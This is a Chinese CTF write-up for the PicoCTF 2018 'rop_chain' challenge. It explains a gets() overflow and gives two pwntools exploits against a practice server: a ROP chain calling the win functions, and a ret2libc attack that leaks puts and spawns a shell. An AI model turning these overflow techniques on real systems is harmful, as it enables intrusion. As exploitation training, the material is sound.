main里面有个gets溢出函数,再点开flag函数看
可以看到传入了一个a1参数,如果win1和win2都是1且a1为-559039827时会输出flag的值
用十六进制比较,该数的十六进制可以直接再ida里面看到
看到win1函数设置了win1为1,win2函数需要再传入一个参数为-1163220307那么win2就是1了
这个参数的十六进制为0x0BAAAAAAD
exp
from pwn import *
#io=process('./PicoCTF_2018_rop_chain')
io = remote('node5.buuoj.cn',27645)
context.log_level='debug'
flag=0x0804862B
win1=0x080485CB
win2=0x080485D8
a11=0xBAAAAAAD
a12=0xDEADBAAD
exit=0x08048470
payload=cyclic(0x18+4)+p32(win1)+p32(win2)+p32(flag)+p32(a11)+p32(a12)+p32(exit)
io.sendline(payload)
io.interactive()
其实这题用libc也可以的
exp
from pwn import *
from LibcSearcher import *
#io=process('./PicoCTF_2018_rop_chain')
io=remote('node5.buuoj.cn',26230)
context.log_level='debug'
elf = ELF('./PicoCTF_2018_rop_chain')
main = elf.sym['main']
puts_plt = elf.plt['puts']
puts_got = elf.got['puts']
flag=0x0804862B
payload1 = cyclic(0x18+4) + p32(puts_plt) + p32(main) + p32(puts_got)
io.sendline(payload1)
puts = u32(io.recvuntil('\xf7')[-4:])
print(hex(puts))
libc = LibcSearcher('puts',puts)
libc_base = puts - libc.dump('puts')
system_addr = libc_base + libc.dump('system')
binsh_addr = libc_base + libc.dump('str_bin_sh')
payload2 = cyclic(0x18+4) + p32(system_addr) + p32(main) + p32(binsh_addr)
io.sendline(payload2)
io.interactive()